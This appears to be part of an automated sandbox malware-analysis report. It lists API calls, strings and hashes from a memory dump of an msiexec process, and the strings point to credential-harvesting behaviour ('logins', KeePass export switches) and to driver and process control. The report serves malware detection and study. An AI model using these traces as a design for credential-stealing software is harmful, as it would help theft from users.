                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1607361635-601624466
                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                              • wcscpy.MSVCRT ref: 004448B4
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 2899246560-1542517562
                                                              • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                              • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DBCD
                                                              • memset.MSVCRT ref: 0040DBE9
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3330709923-517860148
                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040806A
                                                              • memset.MSVCRT ref: 0040807F
                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                              • memset.MSVCRT ref: 004081E4
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                              • String ID: logins$null
                                                              • API String ID: 2148543256-2163367763
                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041087D
                                                              • memset.MSVCRT ref: 00410892
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1010922700-0
                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • free.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • free.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • free.MSVCRT ref: 00418716
                                                              • free.MSVCRT ref: 0041872A
                                                              • free.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 3356672799-1717621600
                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2012295524-70141382
                                                              • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                              • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
